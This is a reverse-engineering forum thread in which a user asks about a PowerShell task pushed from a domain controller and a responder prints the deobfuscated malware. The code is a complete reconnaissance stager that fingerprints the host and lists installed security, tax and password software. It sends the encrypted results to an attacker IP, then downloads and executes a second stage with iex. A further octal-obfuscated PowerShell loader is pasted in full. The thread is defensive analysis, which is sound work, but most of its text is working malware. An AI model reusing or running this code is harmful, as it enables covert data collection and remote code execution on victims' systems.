A forum for reverse engineering, OS internals and malware analysis 

A Memory Resident Virus ?

Ask your beginner questions here.

A Memory Resident Virus ?

 #31196  by 4everyone
 Sun Jan 14, 2018 7:46 am
Happy New Year Folks !

I'm going through a situation where a Scheduled task is getting deployed through the Domain Controller to the workstation. And Task is running a wscript+powershell using a download link which is displayed in the scheduled task script.

Link is - http://192.96.206.191:9097/static/ka7ds ... AHSGA656gh

The above link has some coding. Not sure what its capable of or what actually this script does. Can someone let me know whats the purpose of the above script ? Appreciate your help in advance.

Thanks
4Everyone

Re: A Memory Resident Virus ?

 #31204  by N3mes1s
 Mon Jan 15, 2018 5:18 pm
Hello.
This is pretty interesting, seems to be a recon script(i dunno know if it's a know one and don't have time to check) in powershell. After multiple layer obfuscated with Invoke-Obfuscation and various download from the same ip, this is the code.

It is self explanatory at this stage just read the functions name :)
Code: Select all
function GsdsetWweter {
    $Serv = $args[0]
    $SK = $args[1]
    $USAG = $args[2]
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
    $ErrorActionPreference = "SilentlyContinue";
    $e=[System.Text.Encoding]::ASCII;
    function Get-SysID($HashName = "MD5"){
        [string]$ret = ""
        $hd = gwmi win32_bios
        $ret = $hd["SerialNumber"].ToString()
        [string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
        $StringBuilder = New-Object System.Text.StringBuilder 
        [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{ 
            [Void]$StringBuilder.Append($_.ToString("x2")) 
            } 
            $e = $StringBuilder.ToString().ToLower()
            $e
        }
  Function HasGet-Bretring($ht) { 
  $first = $true
  foreach($pair in $ht.GetEnumerator()) { 
    if ($first) 
    {
       $first = $false
    } 
    else 
    {
       $output += ';'
    }
    $output+="{0}" -f $($pair.Value)
   } 
   $output
  }

 function Get-workconfig {
  Get-WmiObject Win32_NetworkAdapter -Filter 'NetConnectionStatus=2' |
    ForEach-Object {
      $result = 1 | Select-Object Name, IP, MAC, ID
      $result.Name = $_.Name
      $result.MAC = $_.MacAddress
      $result.ID = $_.DeviceID
      $config = $_.GetRelated('Win32_NetworkAdapterConfiguration') 
      $result.IP = $config | Select-Object -expand IPAddress
      $result
    }
 
}
   
    function Get-Sysinfo {     
        $str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; 
        $string = ""
        foreach($c in Get-workconfig){
            [string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
            $ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
            [string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
            $lanconf = @{
            id = $ID 
            ip = $ip;
            mac =  $macadr; 
            name = $lanname;
            }
           $string += HasGet-Bretring $lanconf 
           $string += "!"
        }

        $o = (Get-WmiObject Win32_OperatingSystem)        
        $str += "|$string";
        $str += '|' +$o.Name.split('|')[0];
        if(([Environment]::UserName).ToLower() -eq "system"){
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
        }
        [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
        $Screens = [system.windows.forms.screen]::AllScreens
        foreach ($Screen in $Screens) {                       
            $Width  = $Screen.Bounds.Width            
            $Height  = $Screen.Bounds.Height 
        }
        $str += '|' + "$Width`x$Height"
        $n = [System.Diagnostics.Process]::GetCurrentProcess()
        $str += '|'+$n.ProcessName+'|'+$n.Id
        $str += '|' + $PSVersionTable.PSVersion.Major
        $str += '|' + $ENV:PROCESSOR_ARCHITECTURE
        $str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption 
        $str += '|' + $o.ConvertToDateTime($o.LastBootUpTime)
        $str
    }
    
function getlisturi{
    $RandName = -join("abcdefghijklmoprstvuxyz".ToCharArray()|Get-Random -Count $args[0]);$ar = @('php','jsp','asp') | Get-Random;
    $RandName + '.' + $ar
    }

    function Get-Soft {
    param (
        [Parameter(ValueFromPipeline=$true)]
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [string]$NameRegex = '(Opera|Firefox|Chrome|TAX|Lacerte|OLT|ProSeries|Ultratax|Drake|Taxslayer|ProTaxPro|Taxwise|Avast|ESET|Malwarebytes|McAfee|Norton|Panda|Sophos|Webroot|Bitdefender|Symantec|Trust|EICAR|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|quickbooks|keypass|ftp|ssh|Outlook)'
    )
    foreach ($comp in $ComputerName) {
        $keys = '','\Wow6432Node'
        foreach ($key in $keys) {
            try {
                $apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
            } catch {
                continue
            }
            foreach ($app in $apps) {
                $program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
                $name = $program.GetValue('DisplayName')
                $str = ''
                if ($name -and $name -match $NameRegex) {
                    $str += $name + ';'
                    $str
                }
            }
        }
    }
}
            try {
                $FirstAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;         }
            catch {
                $FirstAES=New-Object System.Security.Cryptography.RijndaelManaged;
            }
    $FirstIV = [byte] 0..255 | Get-Random -count 16;$FirstAES.Mode="CBC";
    $FirstAES.Key=$e.GetBytes($SK);
    $FirstAES.IV = $FirstIV;
    $csp = New-Object System.Security.Cryptography.CspParameters;
    $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
    $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
    $rk=$rs.ToXmlString($False);$ib=$e.getbytes($rk);
    $eb=$FirstIV+$FirstAES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length); 
    $BotIDXor= Get-SysID;
    $EncodedText =[Convert]::ToBase64String($e.getbytes($BotIDXor));
    $EncodedText2 =[Convert]::ToBase64String($e.getbytes($EncodedText));
  if(-not $wc){
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $wc=new-object system.net.WebClient;
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    }
    $wc.Headers.Add("User-Agent",$USAG);
    $wc.Headers.Add("Cookie","SESSIONID:$EncodedText2");
    $raw=$wc.UploadData($Serv + "/" + $(getlisturi 9),"POST",$eb);
    write-host "STAGER GET raw   "  $raw
    $de=$e.GetString($rs.decrypt($raw,$false));
    $key=$de[0..($de.length-2)] -join '';
    $k=$de[$de.length-1] -join '';
  if ($k -eq 0) {
    $str1 =  Get-Sysinfo;
    $str2 =  Get-Soft;
    $str = $str1 + '|' + $str2
    }
  else{$str = 'OK'+ '|' + ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + '|' + ([System.Diagnostics.Process]::GetCurrentProcess()).id}
    $SecondAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
    $SecondIV = [byte] 0..255 | Get-Random -count 16;
    $SecondAES.Mode="CBC"; $SecondAES.Key=$e.GetBytes($key); $SecondAES.IV = $SecondIV; 
    $ib2=$e.getbytes($str);
    $eb2=$SecondIV+$SecondAES.CreateEncryptor().TransformFinalBlock($ib2,0,$ib2.Length);
    $wc.Headers.Add("User-Agent",$USAG);
    $raw=$wc.UploadData($Serv+ "/" + $(getlisturi 13),"POST",$eb2);
try {$AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;}
catch {$AES=New-Object System.Security.Cryptography.RijndaelManaged;}
    $AES.Mode="CBC";
    $IV = $raw[0..15];$AES.Key=$e.GetBytes($key);$AES.IV = $IV;
    $shelles = [System.Text.Encoding]::ASCII.GetString($($AES.CreateDecryptor().TransformFinalBlock($raw[16..$raw.Length],0,$raw.Length-16)))
    iex $shelles
    $FirstAES=$null;$BotIDXor=$null;$rs=$null;$eb2=$null;$raw=$null;$IV=$null;$str=$null;$ib2=$null;$SecondAES=$null;$AES=$null; $SecondIV=$null;$shelles= $null;
    $Error.Clear()
    [GC]::Collect()
    [GC]::WaitForPendingFinalizers()
    federerfegegfeg $key "SESSIONID:$EncodedText2" $Serv '/sale/getinfo.php,/getnews.asp,/update/news.html,/defender/main.jsp,/mains.asp|Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0' $([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $PSVersionTable.PSVersion.Major
    }
  GsdsetWweter 'https://192.96.206.191' ':nP&2[Ia+4E7)V~z.M5pvdrsXle$]!U(' 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0'
https://ghostbin.com/paste/83av7

Re: A Memory Resident Virus ?

 #31212  by 4everyone
 Fri Jan 19, 2018 6:04 pm
Hi N3mes1s,

I found another Obfuscated code running through the GP. can you please decode this for me , so that i will be able to get what it does ?
Code: Select all
. ( $VERbosePREFeREnCe.tosTrINg()[1,3]+'X'-JOiN'') ( ( '146P165h156z143}164<151z157b156;40j107P145}164}55<116;145<167<55<120b162h157L143z173g15}12b160L141b162g141g155P40P50P133L163g164;162h151z156z147;135g44}144j141;164g141P51j15b12b44P120j157P167z145<162g163<150b145g154<154j105<170;145}40g75}40}47}160z157<167b145h162}163P150g145;154j154g56<145}170P145<47L73<40g15b12z164;162h171<40P173;44<160b163}151L40L75z40z116;145<167j55h117j142j152P145L143L164}40b123<171b163z164;145}155h56<104z151b141L147L156j157h163j164h151b143L163z56}120L162z157}143P145j163;163j123z164g141<162b164;111}156P146}157<73;44h160}162z157j143j75;156z145;167;55h157g142<152z145L143<164<40b123}171<163h164;145g155j56P104P151P141j147}156P157;163L164g151P143<163z56}120g162g157}143j145<163b163P73<44h160j163b151h56L103j162j145z141;164h145}116}157g127<151;156L144h157j167<40<75}40;44;164P162b165;145L73}44;160;163g151h56;127h151h156;144z157g167}123j164P171}154z145g40L75b40g47P110}151P144L144L145;156b47z73<44<160P162z157j143g56<123L164;141;162;164z111j156j146;157}40P75g40j44P160z163;151j73b44h160P162P157L143P56;123b164P141}162}164;111<156<146}157L56b106b151j154;145<116j141g155<145z40g75g40L44j120}157b167L145P162;163z150<145b154P154h105b170b145b73h44g160j162}157g143h56h123<164j141j162h164j111h156P146b157}56j101z162b147g165;155}145}156h164<163}40;75P40z47;55;156b157h145P170L151j164g40<47<40}40j40}53z40j47}55b156j157L154<157h147j157<40h47h53j47j55L156L157b160j162j157;146}151z154z145P40P47;53z47z55z116g157;156h111b156b164P145;162}141;143h164<151;166}145g40}47;53P40<47j55<105b156<143L157P144h145L144h103b157j155<155L141g156L144<40L47z53h40g44g144;141j164g141g73j44h160;162b157}143b56g163b164g141P162h164<50g51b174b40<117g165j164g55L116h165<154h154g40P73;175}15g12z143z141z164g143h150g40j173b40}44}137j56j105<170b143b145P160;164j151;157<156j56b115;145j163g163g141;147;145z73P175P15b12L146L151b156h141L154j154z171<173j44<144}141h164h141<40g75g40h44j156P165}154z154P73b133P107P103<135z72<72b103<157<154}154}145b143g164h50L51b73<133L107j103;135z72b72b127;141}151L164<106z157b162j120b145L156h144;151g156L147h106<151g156;141j154j151b172j145b162g163h50;51;73}175P175<15;12P107;145b164j55L116j145g167b55P120<162b157h143b40<55}144<141z164L141h40b47h141h121z102z154P101j110h147L101b111;101j101<153b101P103P147g101<127z167j102j123<101b107b125<101<122j147h102j144h101L103z64L101j121<121L102<124<101g106b115z101b132}121L102b164;101h107h111b101;124<101b102b65}101h103;64b101<122;167}102h154<101j106b121g101P126b101b102;132g101P106g101b101g122L121g101}157P101<103z143z101b125;167b102j65<101z110h115b101;144;101}102j154g101P107j60h101j114g147b102;116g101b107}105z101j142}147<102P150j101}107b143h101z132z121}102g164L101}107;125j101j142b147P102P60<101;103}64<101g121;121h102j61}101j110b121L101g142z167L102}164P101z107h105}101b144z101}102g160h101<107j70j101;142z147L101j165L101j105P105b101g142<121h102}172g101b107b153h101z126P121b102}60}101<107}153<101h142z101b102b172b101;103<143P101z113<121b102P70L101b104z70j101<145P167L101<153j101L106P70;101j146L121P102b70<101j103<125j101P145g167L101L153j101j106P70<101g114g147L102h110}101}105P125;101}144}101<102g107j101;107}153h101b132<121j102L163P101g105L121L101<113j101j101L156L101g107L105g101b142z121P102L172j101b107L153j101h123g121<102b165<101j107<153h101h144<101z102;107h101j107<105L101<141b121L102<163g101;107}125;101}132z101P101b156z101P103;167<101}112<167P102L117b101<107z70;101;142P147L102}121P101z110b125L101L131<147j102;163P101b107h153b101b131b167L101P163<101z106L115L101;144g101;102j150b101j110j121z101h141g121P102b152}101}103g143b101b113h121L101}165<101<106<115}101<122<121L102}125<101;106;131z101z121h121P102b115;101h106P125b101z122P121;101L157}101P103h121;101j124h147j102;126P101h105g167g101}142<101b101g163P101<103}121;101j126}101L102z123;101}110;125h101b122b121L101;160b101;110z60h101h117z167b102<142g101P106z115g101P145g121<102g172h101L110<121P101j132h121;102P164b101g103b64P101}124P147L102L154<101}110L121}101j114<147b102<124z101g107;125P101L143g147z102;62<101j107}153L101<131P167j102b154h101z106b101;101z142b167g102z160j101b107b64;101P144z101b102z116b101L107;105b101L142<147z102j150b101P107P143<101;132h121b102P171<101g106<60}101j117P147}101h66L101}106;115L101L132b121P102P171g101P110z131b101z132j121L102}171}101z105h115P101b132z121z102;171P101h110<121z101b141L121h102P155;101h107j153b101z131;167z102b150g101h110;121b101;132z121L102;127g101L107;105}101g142j101g102z160<101g107b121L101L131P121L102j60j101;107z153b101h142g167;102P165j101;105j115<101b131L121<102<163h101j107}167g101b131j147b102z150}101L107j115P101L141P167b101}71j101P110g163b101L112<101b102}60L101}110z111;101}144;121}102<154h101L110P60h101h117b167z102j142;101z106;115;101;145b121b102L172z101L106}121h101j122L121g102P164<101;103<64h101;124;147;102L154;101z110L121P101z114z147}102g124;101<107P125h101L125L147h102<62<101P105P153g101;121j167h102;154}101j106}101g101;142g167;102}112h101z107P64b101<144}101z102z116}101}105}105h101}142h147L102z150g101}105<143h101z122j121j102h171P101j106j60P101b117h147h101;66P101}105<125P101g145z101L102j167;101}107b125}101g131}167L102<60j101}104}105<101h115j101g101g167z101z105h115z101}142z167z102;165h101g106h121}101}123j121j102z117b101b110g125P101j122z121P101<71<101j104<101j101b117;167b101P147}101<103g147}101P124j147<102h154;101}110;143g101L114h121h102z120L101<107}111h101g141L147j102z154}101b107L115<101j144z101g101;147}101j106P115b101z145L121z102L172b101g110<121<101P132g121}102}164P101b103<64j101L124;147z102;154z101j110;121}101L114}147z102;130g101L107P125;101}131g147P102;104L101L107;167h101b141}121b102g154;101b107P64L101}144L101b101L160b101j103j64}101}122;101h102z166}101<110b143h101}124<147b102j115<101<105L70}101P131;121z102P153j101}106<115<101L144P101j102;123z101P105z153L101h124;147g102z110b101h103h147L101z112g167z102;157b101j110b121j101g144L101L102L167L101L110L115b101g117L147h101z166L101z103z70b101;115<121h101}65P101j104z111}101}114}147h101z65g101L104z131}101b114g147<101b171;101z104}101j101h116j147h101P165z101z104z105}101z117j121P101j170z101;103P70P101<112g167;101g162;101z103;101}101z112}101L101b157P101<103b60P101P141L147g102}166z101L107;153h101;142g147g101g157P101;103}143z101b121}121j102L103;101;105j115P101}122h101P102b106L101L105h131b101P122h167g102g111j101b105j163}101g124P101P102j116P101b105b64<101z142<147L102<166g101P110;101h101j143;121b102j171g101b110}115h101h144L101g102<62}101;110h125P101j144b167z102<64g101b110P153z101j145b147<101j156z101;103g64g101<126P101<102}166j101;105b115g101g141P101g102b150j101z110P111b101<121;121}102L171;101L110P111;101j131h121z102j65<101h103z147j101P113;121h102<70g101b105g143h101h132z121h102<60P101z103j60}101z125g147g102P150j101z107h64L101g132z101g102L166b101P107P60L101L111j101;101}164g101;105;115L101<142;167h102z61z101}107;64;101}144b101;101<147g101z104z147P101j113;121h101}160L101}103<163;101;112g167h101L165P101L103}143}101j113b167b101j147g101<103<121j101z113;101h102g101z101;103g147<101P112h167b102b167L101;107;147j101}143h101L101<156j101P103g167b101g112<167<102<161b101P110P115j101h143L101g101L156P101<103<167L101}112j167L102L150P101L110h115z101;143z101<101z156}101L103b153h101;111j101z102}70P101;103<101P101b122j167b102<154g101g110<121b101j114h121}102;123P101g107L105;101g142L147<102<153<101j107P70}101P142g121z101h160z101;103g153P101}113g121g101z75<47<15g12L163}164P141z162L164<55L163}154h145b145b160<40;55g163h40P65}15}12g145j170P151b164'-SPLiT ';'-SplIt'}' -sPlit'z' -Split 'b'-SPLiT 'P' -SPlit 'j'-SpliT '<' -sPLiT'L' -SpLiT'g' -SPlIT 'h'|FoREaCH{ ( [ConVERt]::tOINT16(( [STrInG]$_ ) ,8 ) -aS [CHar])} ) -jOiN'' )
 Return to “Newbie Questions”